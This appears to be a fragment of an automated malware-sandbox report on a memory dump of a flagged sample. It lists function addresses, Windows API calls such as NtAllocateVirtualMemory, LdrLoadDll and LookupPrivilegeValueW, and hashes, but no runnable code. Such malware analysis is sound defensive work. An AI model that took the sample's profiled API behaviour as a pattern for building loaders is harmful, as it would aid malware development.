b=A, xrefs: 004182BD, 004182C4
b=A, xrefs: 004182A2, 004182B0
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Strings

6HCU, xrefs: 004183AC

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 6HCU
API String ID: 2167126740-1255677348
Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418222, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B798FA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
Instruction ID: ce0d6dce66d879e33f6c40a8e508eeb5a1711006ba0e35d2e663a55ae85a855a
Opcode Fuzzy Hash: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
Instruction Fuzzy Hash: 0590026260100502D20171598404A16014AD7D0381F91C077E101455AECA6589A2F671

Uniqueness

Uniqueness Score: -1.00%

Function 00B796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B796EA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
Instruction ID: e16c3bbb2738a46380d85e3196ee5a816bcb28d37a777420db30898e17dc07bf
Opcode Fuzzy Hash: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
Instruction Fuzzy Hash: 6690027220108802D2107159C404B4A0145D7D0341F55C466E441465DD86D588A1F661

Uniqueness

Uniqueness Score: -1.00%

Function 00B79A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B79A2A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
Instruction ID: 8518f7d971b8385b00d46df963d5d08d852c4c5abbad2dfd0f3d464990a1448c
Opcode Fuzzy Hash: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
Instruction Fuzzy Hash: 549002626010004242407169C844D064145FBE1351751C176E0988555D85998875EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B79A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B79A0A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
Instruction ID: 86913b632f1dd0a44cadd4c0b8c9aaeb6cb56c89aaac841c445bbf4a6ce844fb
Opcode Fuzzy Hash: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
Instruction Fuzzy Hash: 0A90027220140402D20071598814B0B0145D7D0342F51C066E115455AD86658861FAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00B79860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7986A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
Instruction ID: 9eb69281b6446c6de08db11e229d61495eb594aaeebd43d1ec186b184904c664
Opcode Fuzzy Hash: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
Instruction Fuzzy Hash: CC90027220100413D21171598504B070149D7D0381F91C467E041455DD96968962F661

Uniqueness

Uniqueness Score: -1.00%

Function 00B79660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7966A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
Instruction ID: b2f3d2a66bee0d2f2452ac2e74e391c4f59afcd1ac0cc30fb83436a946d8b7ad
Opcode Fuzzy Hash: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
Instruction Fuzzy Hash: FF90027220100802D28071598404A4A0145D7D1341F91C06AE0015659DCA558A69FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B79A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B79A5A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
Instruction ID: 85431d05685d319fed4f690c07b426bd3616a5f4e68691619912fc76efab5d9e
Opcode Fuzzy Hash: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
Instruction Fuzzy Hash: 3990026221180042D30075698C14F070145D7D0343F51C16AE0144559CC9558871EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00B79840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7984A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
Instruction ID: 061872587d756b2b6a952fbf2d087fccdd503f372d0caeb2b6caf3e5c4033e98
Opcode Fuzzy Hash: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
Instruction Fuzzy Hash: 05900262242041525645B15984049074146E7E0381791C067E1404955C85669866EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B797AA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
Instruction ID: 025cb29e532ecc119f5fdd41d7433a0aeebaf252031769ba4c637240d42c0113
Opcode Fuzzy Hash: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
Instruction Fuzzy Hash: A590026230100003D24071599418A064145E7E1341F51D066E0404559CD9558866E762

Uniqueness

Uniqueness Score: -1.00%

Function 00B799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B799AA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
Instruction ID: 9da24e97d4b011f738d8982c3ce8b730d900356ba9609f783baa97114112606c
Opcode Fuzzy Hash: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
Instruction Fuzzy Hash: FF9002A234100442D20071598414F060145D7E1341F51C06AE1054559D8659CC62F666

Uniqueness

Uniqueness Score: -1.00%

Function 00B79780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7978A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
Instruction ID: 5dfa6c933f30dd59c5b9af5b6a2e73c4648d4bf628751f84d45324630e55fc66
Opcode Fuzzy Hash: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
Instruction Fuzzy Hash: C790026A21300002D28071599408A0A0145D7D1342F91D46AE000555DCC9558879E761

Uniqueness

Uniqueness Score: -1.00%

Function 00B79FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B79FEA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
Instruction ID: 29132c593c4d79ab0d172ace2f5a2d920761199e7903d005f506627bf1baeec3
Opcode Fuzzy Hash: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
Instruction Fuzzy Hash: 2890027231114402D2107159C404B060145D7D1341F51C466E081455DD86D588A1F662

Uniqueness

Uniqueness Score: -1.00%

Function 00B795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B795DA

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
Instruction ID: 56603ca9c53d385a80cf7bb611a13209602c8ba3b1bdc73bcc36e00c41e33fa9
Opcode Fuzzy Hash: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
Instruction Fuzzy Hash: 3B9002A220200003420571598414A16414AD7E0341B51C076E1004595DC56588A1F665

Uniqueness

Uniqueness Score: -1.00%

Function 00B79910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7991A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
Instruction ID: 90f86da2c744b51d0b1490cbf77feee4780841c83c4da16e7610f395fe283644
Opcode Fuzzy Hash: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
Instruction Fuzzy Hash: 6E9002B220100402D24071598404B460145D7D0341F51C066E5054559E86998DE5FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B79710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7971A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
Instruction ID: fa01ffcd26241440f0f1d8948560431c01da16209a912eac58e2da253c2b16f3
Opcode Fuzzy Hash: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
Instruction Fuzzy Hash: 3E90027220100402D20075999408A460145D7E0341F51D066E501455AEC6A588A1F671

Uniqueness

Uniqueness Score: -1.00%

Function 00B79540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B7954A

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
Instruction ID: c9a959d7522151d9d0f6a705b83cb645f0f23cf5b46546335af526c168ccb99c
Opcode Fuzzy Hash: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
Instruction Fuzzy Hash: A9900266211000030205B55947049070186D7D5391351C076F1005555CD6618871E661

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
Instruction ID: 9a823f8c78894249dba104d5ea0f087799ce9c1430a6f2244117b3d31d4b0435
Opcode Fuzzy Hash: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
Instruction Fuzzy Hash: 4B01ADB22042446FDB24DFA5DC89EEB7B68EF84350F14859DF98D5B282C930E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184D4, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
Instruction ID: ab81e3b6ab6d3b91ce71e5eff0dc86bffa658c17d00b5c940c9f491b72657ba9
Opcode Fuzzy Hash: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
Instruction Fuzzy Hash: 24E0D8BC2442851BDB04EE69E4908E73795FF85354714994EEC9987307C534D8568BB1

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
Instruction ID: dd81a4506f34eb1dc815d8e525c1c8e650a7b6415f3c6e3ee69276a5238c3cd9
Opcode Fuzzy Hash: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
Instruction Fuzzy Hash: 12E04F31600615BFC324DF65CC85FE33B64AF59790F0545ADF91A9B682C631A601CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
Instruction ID: b01ba6cf3436e3ac7ba59ad1e4c80d6b9cf1e4843ea3370bd1df8a4db748f34e
Opcode Fuzzy Hash: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
Instruction Fuzzy Hash: EDE04FB12002046FDB10DF55DC84EE73769EF88350F018159F90C97281C935E8118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B79694

Memory Dump Source

Source File: 00000003.00000002.284492254.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
Instruction ID: bec34b670d5326920ac72b5bb9364ddcc73b5106a9da09ff301e3e43f2837250
Opcode Fuzzy Hash: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
Instruction Fuzzy Hash: 66B09B729014C5C5D711E7604608F177A40F7E0741F16C1A6D1160645A4778C491F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408C6C, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00408F8C

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
